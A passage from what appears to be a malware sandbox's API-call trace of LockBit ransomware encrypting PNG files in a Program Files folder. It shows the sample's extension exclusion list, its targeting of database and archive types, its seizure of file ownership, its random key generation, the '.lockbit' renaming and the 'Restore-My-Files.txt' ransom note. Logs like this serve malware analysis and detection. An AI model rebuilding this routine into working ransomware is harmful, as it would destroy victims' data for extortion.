DirectoryInfo=0x0) returned 1 [0088.227] malloc (_Size=0xa6) returned 0x77d800 [0088.227] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0088.227] free (_Block=0x77d800) [0088.228] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.228] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.228] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.228] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71338a7f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71338a7f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0088.228] lstrcmpiW (lpString1=".", lpString2="highlight.png") returned -1 [0088.228] lstrcmpiW (lpString1="..", lpString2="highlight.png") returned -1 [0088.228] PathFindExtensionW (pszPath="highlight.png") returned=".png" [0088.228] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.228] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.228] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.229] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.229] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.230] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="highlight.png") returned 1 [0088.230] lstrcmpiW (lpString1="ntldr", lpString2="highlight.png") returned 1 [0088.230] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="highlight.png") returned 1 [0088.230] lstrcmpiW (lpString1="bootsect.bak", lpString2="highlight.png") returned -1 [0088.230] lstrcmpiW (lpString1="autorun.inf", lpString2="highlight.png") returned -1 [0088.230] lstrcmpiW (lpString1="thumbs.db", lpString2="highlight.png") returned 1 [0088.230] lstrcmpiW (lpString1="iconcache.db", lpString2="highlight.png") returned 1 [0088.230] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.230] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png") returned=".png" [0088.230] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.230] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.230] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.230] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.231] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.231] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.231] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.231] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.231] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.231] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png.lockbit") returned 73 [0088.231] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.231] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.232] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.232] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.232] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.232] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.232] RtlFreeAnsiString (AnsiString="\\") [0088.232] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.232] malloc (_Size=0x200) returned 0x77d800 [0088.232] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.232] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.232] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.232] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.233] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.233] CloseHandle (hObject=0x3a0) returned 1 [0088.233] free (_Block=0x77d800) [0088.233] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.233] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.233] malloc (_Size=0x40068) returned 0x1fb18c0 [0088.233] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=27964) returned 1 [0088.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0088.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0088.234] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.254] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.254] malloc (_Size=0xa8) returned 0x77d800 [0088.254] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0088.255] free (_Block=0x77d800) [0088.255] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.255] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.255] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.255] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xba2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationButtonSubpicture.png", cAlternateFileName="")) returned 1 [0088.255] lstrcmpiW (lpString1=".", lpString2="NavigationButtonSubpicture.png") returned -1 [0088.255] lstrcmpiW (lpString1="..", lpString2="NavigationButtonSubpicture.png") returned -1 [0088.255] PathFindExtensionW (pszPath="NavigationButtonSubpicture.png") returned=".png" [0088.255] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.255] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.255] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.255] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.255] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.255] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.255] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.256] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.256] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.257] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.257] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.257] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationButtonSubpicture.png") returned 1 [0088.257] lstrcmpiW (lpString1="ntldr", lpString2="NavigationButtonSubpicture.png") returned 1 [0088.257] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationButtonSubpicture.png") returned 1 [0088.257] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationButtonSubpicture.png") returned -1 [0088.257] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationButtonSubpicture.png") returned -1 [0088.257] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationButtonSubpicture.png") returned 1 [0088.257] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationButtonSubpicture.png") returned -1 [0088.257] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.257] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png") returned=".png" [0088.257] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.257] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.257] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.257] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.258] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.258] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.258] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png.lockbit") returned 90 [0088.258] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.259] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.259] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.259] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.259] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.259] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.259] RtlFreeAnsiString (AnsiString="\\") [0088.259] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0088.260] malloc (_Size=0x200) returned 0x77d800 [0088.260] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.260] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.260] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.260] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.260] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.260] CloseHandle (hObject=0x3ac) returned 1 [0088.260] free (_Block=0x77d800) [0088.261] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0088.261] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.261] malloc (_Size=0x40068) returned 0x2031ed0 [0088.262] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=2978) returned 1 [0088.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0088.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0088.263] ReadFile (in: hFile=0x3ac, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0088.268] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.268] malloc (_Size=0xca) returned 0x77d800 [0088.268] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xca, FileInformationClass=0xa) returned 0x0 [0088.268] free (_Block=0x77d800) [0088.268] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.268] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.268] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.268] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0088.268] lstrcmpiW (lpString1=".", lpString2="NextMenuButtonIcon.png") returned -1 [0088.268] lstrcmpiW (lpString1="..", lpString2="NextMenuButtonIcon.png") returned -1 [0088.268] PathFindExtensionW (pszPath="NextMenuButtonIcon.png") returned=".png" [0088.268] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".exe", 